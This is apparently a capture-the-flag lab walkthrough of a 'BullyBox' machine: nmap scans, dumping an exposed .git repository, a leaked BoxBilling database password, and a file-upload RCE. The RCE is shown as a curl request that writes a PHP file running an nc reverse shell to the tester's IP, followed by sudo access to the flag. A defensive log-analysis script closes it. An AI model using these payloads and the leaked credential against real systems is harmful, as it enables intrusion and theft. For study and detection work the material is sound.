Key takeaways

  • If a domain name is discovered, add it to /etc/hosts and rerun nmap, nikto and similar scans.
  • When running dirsearch, use a more complete wordlist so that nothing is missed.
  • .git dump

Detailed steps

Run an nmap scan. Ports 80 and 22 are open, and visiting the site redirects to bullybox.local.

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-14 12:20 UTC
Nmap scan report for 192.168.59.27
Host is up (0.00072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.52 (Ubuntu)
```

Edit /etc/hosts to bind the IP to bullybox.local, then rerun the nmap scan. This returns more information, such as the .git path and the entries in robots.txt.

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-15 17:50 EDT
Nmap scan report for bullybox.local (192.168.174.27)
Host is up (0.44s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_  256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
| http-robots.txt: 8 disallowed entries
| /boxbilling/bb-data/ /bb-data/ /bb-library/
|_/bb-locale/ /bb-modules/ /bb-uploads/ /bb-vendor/ /install/
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Client Area
| http-git:
|   192.168.174.27:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file description to name the...
|_    Last commit message: Ready For launch
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
```

Visiting the paths listed in robots.txt reveals what appears to be the admin username.

A web search for a tool that can dump .git turns up "GitHub - arthaud/git-dumper: A tool to dump a git repository from a website". Running it dumps the git repository successfully. If a proxy is configured, remember to run unset http_proxy first, otherwise the tool reports a 502 error.

```
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD [502]
[-] http://bullybox.local//.git/HEAD responded with status code 502

C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> unset http_proxy
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox\git-dumper-master> python git_dumper.py http://bullybox.local/.git ~/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/dump
/home/kali/Documents/OFFSEC/GoToWork/BullyBox/git-dumper-master/git_dumper.py:409: SyntaxWarning: invalid escape sequence '\g'
  modified_content = re.sub(UNSAFE, '# \g<0>', content, flags=re.IGNORECASE)
[-] Testing http://bullybox.local/.git/HEAD [200]
[-] Testing http://bullybox.local/.git/ [403]
[-] Fetching common files
[-] Fetching http://bullybox.local/.git/hooks/post-update.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-commit.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/post-commit.sample [404]
[-] http://bullybox.local/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://bullybox.local/.git/description [200]
[-] Fetching http://bullybox.local/.gitignore [404]
[-] http://bullybox.local/.gitignore responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/post-receive.sample [404]
[-] http://bullybox.local/.git/hooks/post-receive.sample responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://bullybox.local/.git/COMMIT_EDITMSG [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/commit-msg.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/pre-push.sample [200]
[-] Fetching http://bullybox.local/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://bullybox.local/.git/index [200]
[-] Fetching http://bullybox.local/.git/objects/info/packs [404]
[-] http://bullybox.local/.git/objects/info/packs responded with status code 404
[-] Fetching http://bullybox.local/.git/hooks/pre-receive.sample [200]
```

Running cat /bb-config.php on the dumped repository reveals what looks like a password. Combined with the username found earlier, admin@bullybox.local, the login succeeds.

```
  array (
    'type' => 'mysql',
    'host' => 'localhost',
    'name' => 'boxbilling',
    'user' => 'admin',
    'password' => 'Playing-Unstylish7-Provided',
  ),
```

The version turns out to be 4.22.1.5. A search shows it has a file upload vulnerability: "BoxBilling<=4.22.1.5 - Remote Code Execution (RCE) - PHP webapps Exploit". Try exploiting it.

First use Firefox to read the PHP session ID stored in the cookie and start nc -nlvp locally, then send the request below. I sent it with Postman, which generates the following curl command.

```
curl --location http://bullybox.local/index.php?_url%2Fapi%2Fadmin%2FFilemanager%2Fsave_file \
--header Cookie: PHPSESSIDtjlfj0mpf85cjgh8g0rjtc0jnn \
--header Content-Type: application/x-www-form-urlencoded \
--data-urlencode order_id1 \
--data-urlencode pathreverse.php \
--data-urlencode data?php shell_exec(\rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 21 | nc 192.168.45.209 80/tmp/f\); ?
```

A reverse shell comes back, and the account has sudo privileges, so the flag can be read directly.

```
C:\home\kali\Documents\OFFSEC\GoToWork\BullyBox> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.209] from (UNKNOWN) [192.168.226.27] 57090
bash: cannot set terminal process group (1311): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

yuki@bullybox:/var/www/bullybox$ id
id
uid=1001(yuki) gid=1001(yuki) groups=1001(yuki),27(sudo)
yuki@bullybox:/var/www/bullybox$ sudo -l
sudo -l
Matching Defaults entries for yuki on bullybox:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User yuki may run the following commands on bullybox:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
yuki@bullybox:/var/www/bullybox$ sudo cat /root/proof.txt
sudo cat /root/proof.txt
2cf1d3dd8eab874dd006dad9912c1388
yuki@bullybox:/var/www/bullybox$
```
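From the defender's side, both the repository dump and the Filemanager write in this walkthrough leave a clear trail in the web server's access log. The following is an added example, not part of the original write-up or of any project named in it: it assumes Apache "combined" log format, the helper names `analyze` and `alerts` are hypothetical, and the sample log lines (addresses, sizes, user agents) are constructed.

```python
import re
from urllib.parse import unquote
# Constructed sample in Apache "combined" format (addresses and agents are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [15/Oct/2024:17:51:02 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "python-requests/2.31"
10.0.0.5 - - [15/Oct/2024:17:51:02 +0000] "GET /.git/ HTTP/1.1" 403 199 "-" "python-requests/2.31"
10.0.0.5 - - [15/Oct/2024:17:51:03 +0000] "GET /.git/index HTTP/1.1" 200 51234 "-" "python-requests/2.31"
10.0.0.5 - - [15/Oct/2024:17:51:03 +0000] "GET /.git/objects/info/packs HTTP/1.1" 404 196 "-" "python-requests/2.31"
10.0.0.9 - - [15/Oct/2024:17:52:10 +0000] "GET /index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
10.0.0.5 - - [15/Oct/2024:18:05:44 +0000] "POST /index.php?_url=%2Fapi%2Fadmin%2FFilemanager%2Fsave_file HTTP/1.1" 200 31 "-" "PostmanRuntime/7.39"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
SAVE_FILE = "/api/admin/filemanager/save_file"  # endpoint from the walkthrough, lowercased

def analyze(log_text):
    """Group suspicious requests by client IP (hypothetical helper)."""
    report = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        decoded = unquote(m["target"])          # turns %2F back into / inside _url
        path = decoded.split("?", 1)[0]
        is_git = "/.git/" in path.lower() or path.lower().endswith("/.git")
        is_write = m["method"] == "POST" and SAVE_FILE in decoded.lower()
        if not (is_git or is_write):
            continue
        entry = report.setdefault(m["ip"], {"git_served": [], "git_probes": 0, "save_file_posts": 0})
        if is_git and m["status"] == "200":
            entry["git_served"].append(path)    # repository content actually left the server
        elif is_git:
            entry["git_probes"] += 1            # 403/404: probing without a successful read
        if is_write:
            entry["save_file_posts"] += 1
    return report

def alerts(report):
    out = []
    for ip, e in sorted(report.items()):
        if e["git_served"]:
            out.append(f"{ip}: {len(e['git_served'])} .git file(s) served, e.g. {e['git_served'][0]}")
        if e["save_file_posts"]:
            out.append(f"{ip}: {e['save_file_posts']} POST(s) to Filemanager save_file")
    return out

if __name__ == "__main__":
    print("\n".join(alerts(analyze(SAMPLE_LOG))))
```

Any entry in `git_served` means repository files were handed out with status 200, so secrets committed there (such as the database password in bb-config.php) should be treated as exposed and rotated.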